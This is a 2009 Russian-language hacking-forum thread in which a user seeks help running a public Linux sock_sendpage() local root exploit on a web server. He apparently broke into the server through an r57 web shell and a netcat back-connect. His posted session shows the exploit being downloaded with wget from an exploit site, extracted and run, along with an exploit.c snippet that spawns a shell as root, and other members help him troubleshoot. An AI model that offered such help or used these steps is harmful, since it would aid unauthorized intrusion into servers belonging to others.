Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)
-   -   Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [3] (https://forum.antichat.xyz/showthread.php?t=153189)

M@rtein 02.11.2009 18:36
Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [3]
 
Скачал сплоит под Linux
http://milw0rm.com/exploits/9641
Помогите разобраться с его использованием.
Необходимо получить рута на
Цитата:
uname -a: Linux 121320-web1.www1.domen.org 2.6.9-89.0.11.ELsmp #1 SMP Mon Aug 31 11:01:10
EDT 2009 i686
Запускаю netcat и через r57 с помощью back-connect'а получаю консоль, далее:
Цитата:
Cmd line: -l -p 11457
Linux 121320-web1.www1.domen.org 2.6.9-89.0.11.ELsmp #1 SMP Mon Aug 31
11:01:10 EDT 2009 i686 i686 i386 GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache)
cd /tmp/
mkdir logs
cd /tmp/logs
wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
--08:23:23-- http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
=> `2009-linux-sendpage3.tar.gz'
Resolving milw0rm.com... 66.227.17.18
Connecting to milw0rm.com|66.227.17.18|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,871 (3.8K) [application/x-gzip]

0K ... 100% 3.42 MB/s

08:23:23 (3.42 MB/s) - `2009-linux-sendpage3.tar.gz' saved [3871/3871]

tar xvfz ./*tar.gz
linux-sendpage3/
linux-sendpage3/sesearch-mmap_zero
linux-sendpage3/run
linux-sendpage3/exploit-pulseaudio.c
linux-sendpage3/exploit.c
linux-sendpage3/runcon-mmap_zero
cd ./linux-*
chmod 0777 ./*
ls -lia
total 36
98307 drwxr-xr-x 2 apache apache 4096 Sep 10 20:47 .
98305 drwxr-xr-x 3 apache apache 4096 Nov 2 08:24 ..
98310 -rwxrwxrwx 1 apache apache 358 Sep 10 20:57 exploit-pulseaudio.c
98311 -rwxrwxrwx 1 apache apache 9113 Sep 10 14:36 exploit.c
98309 -rwxrwxrwx 1 apache apache 1127 Sep 10 22:00 run
98312 -rwxrwxrwx 1 apache apache 1068 Sep 10 14:01 runcon-mmap_zero
98308 -rwxrwxrwx 1 apache apache 1018 Sep 6 19:44 sesearch-mmap_zero
sh run
run: line 33: ./exploit: Permission denied
Подскажите пожалуйста что не так делаю?

ShAnKaR 02.11.2009 23:45
еще раз ls -la и mount сюда

krypt3r 03.11.2009 08:15
Файл exploit скорее всего не является исполняемым
Код:
$ chmod 0755 exploit

M@rtein 03.11.2009 14:25
Понял свой косяк!!! Спасибо за наводку ShAnKaR

Код:
mount
/dev/sda5 on / type ext3 (rw)
none on /proc type proc (rw)
none on /sys type sysfs (rw)
none on /dev/pts type devpts (rw,gid=5,mode=620)
usbfs on /proc/bus/usb type usbfs (rw)
/dev/sda1 on /boot type ext3 (rw)
none on /dev/shm type tmpfs (rw,noexec,nosuid,nodev)
/dev/sda2 on /tmp type ext3 (rw,noexec,nosuid,nodev)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
Теперь выдает:
Код:
sh run
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol

Ruskey 04.11.2009 22:52
Теперь выдает:
Код:
sh run
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol
socket: Address family not supported by protocol

Ну что, теперь открой исходник и посмотри логику, которая ведет к данному сообщению. (капитан очевидность)

M@rtein 05.11.2009 10:58
Ruskey, полагаю в exploit.c возникает в условии, но что подправить я не знаю...
Код:
exploit:
        if (s[i][0] == PF_MAX)
                exit(EXIT_FAILURE);

        if ((out_fd = socket(s[i][0], s[i][1], s[i][2])) == -1) {
                perror("socket");
                i++;
                goto exploit;
        }

        sendfile(out_fd, in_fd, NULL, PAGE_SIZE);

        if (getuid() || getgid()) {
                close(out_fd);
                i++;
                goto exploit;
        }

        execl("/bin/sh", "sh", "-i", NULL);

        exit(EXIT_SUCCESS);
}

Ex@rcist 11.11.2009 15:39
/dev/sda2 on /tmp type ext3 (rw,noexec,nosuid,nodev)
ни о чем не говорит?..

ShAnKaR 12.11.2009 01:21
Цитата:
Сообщение от Ex@rcist
/dev/sda2 on /tmp type ext3 (rw,noexec,nosuid,nodev)
ни о чем не говорит?..
кажется ты опоздал )

oRb 12.11.2009 18:24
M@rtein
Информация об уязвимости была опубликована 13 августа (патч был сделан в тот же день). А ваше ядро было собрано 31го. Отсюда вывод: рута через этот сплойт не получить.

M@rtein 13.11.2009 15:55
oRb спасибо за ответ. Теперь буду это учитывать.

И кстати вот тоже может кто подскажет по XNU Darwin.
Ссылка на тему на ачате http://forum.antichat.ru/showthread.php?t=135264


Время: 15:58